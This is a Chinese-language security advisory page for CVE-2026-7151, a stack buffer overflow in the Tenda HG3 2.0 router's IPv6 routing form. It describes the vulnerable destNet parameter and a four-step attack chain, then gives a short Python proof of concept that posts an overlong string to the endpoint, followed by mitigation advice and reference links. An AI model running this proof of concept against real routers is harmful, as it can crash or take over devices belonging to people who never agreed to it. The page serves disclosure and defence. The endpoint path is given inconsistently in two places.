CVE-2026-7151 CVSS 8.8 高危

CVE-2026-7151 Tenda HG3 栈缓冲区溢出漏洞

披露日期: 2026-04-27

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-7151

漏洞类型

缓冲区溢出

CVSS评分

8.8 高危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Tenda HG3

漏洞概述

Tenda HG3 2.0版本被发现存在一个高危安全漏洞，该漏洞位于/boaform/formIPv6路由文件的formUploadConfig函数中。问题的根源在于程序未能正确过滤用户提交的destNet参数，从而触发了栈缓冲区溢出。由于该漏洞允许远程攻击，且攻击复杂度低、无需用户交互，一旦被成功利用，攻击者完全可能获取设备控制权，进而导致敏感信息泄露、数据被篡改或服务中断。目前相关利用代码已公开披露，风险极高。

技术细节

该漏洞属于典型的栈缓冲区溢出，影响Tenda HG3 2.0版本的路由器设备。漏洞根因位于/boaform/formIPv6Routing接口的formUploadConfig函数中。在处理HTTP请求时，该函数直接提取用户提交的“destNet”参数，并在未进行有效长度校验的情况下，使用不安全的拷贝函数将其复制到栈上的局部变量缓冲区。由于栈空间有限，攻击者可以通过发送超长字符串覆盖栈上的返回地址或函数指针。攻击者构造包含恶意机器码的特定Payload，一旦溢出成功，程序流程将被劫持，转向执行攻击者的代码。鉴于CVSS评分显示攻击可远程进行且无需用户交互，攻击者仅需发送一个特制的HTTP POST请求即可触发该漏洞，从而导致设备崩溃或获取系统最高权限，实现对设备的完全控制。

攻击链分析

STEP 1

侦察

攻击者扫描网络，识别目标为Tenda HG3 2.0设备，并确认其Web管理接口（通常为端口80）对外开放。

STEP 2

漏洞利用

攻击者向/boaform/formIPv6Routing端点发送精心构造的HTTP POST请求，其中包含超长的destNet参数。

STEP 3

溢出执行

由于未检查输入长度，超长数据覆盖栈上的返回地址，劫持程序执行流，跳转到攻击者注入的恶意代码。

STEP 4

系统控制

恶意代码以设备权限运行，攻击者获得远程代码执行权限，从而完全控制路由器。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Target URL (Replace with actual IP)
target_url = "http://192.168.0.1/boaform/formIPv6Routing"

# Malicious payload to trigger stack-based buffer overflow
# The 'destNet' parameter is vulnerable
# Sending a long string of 'A's to overwrite the return address
payload_data = {
    "destNet": "A" * 500,
    # Other form fields may be required depending on the form structure
}

try:
    # Send POST request to trigger the vulnerability
    response = requests.post(target_url, data=payload_data)
    
    if response.status_code == 200:
        print("[+] Payload sent successfully.")
        print("[+] Check if the device crashes or if a shell is spawned.")
    else:
        print(f"[-] Request failed with status code: {response.status_code}")
        
except requests.exceptions.RequestException as e:
    print(f"[-] An error occurred: {e}")

影响范围

Tenda HG3 2.0

防御指南

临时缓解措施

建议用户立即访问Tenda官网检查并升级路由器固件至最新版本。若暂无补丁，应限制对路由器管理界面的远程访问，仅允许可信的内网IP进行访问，并关闭不必要的Web管理服务端口以降低被攻击风险。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-7151
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-7151
3 Details https://www.cvedetails.com/cve/CVE-2026-7151/
4 VulDB https://vuldb.com/cve/CVE-2026-7151
5 Link https://vuldb.com/submit/802058
6 Link https://vuldb.com/vuln/359750
7 Link https://vuldb.com/vuln/359750/cti
8 Link https://www.notion.so/33e0c75766a88041bd86d3810994a541
9 Link https://www.tenda.com.cn/

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表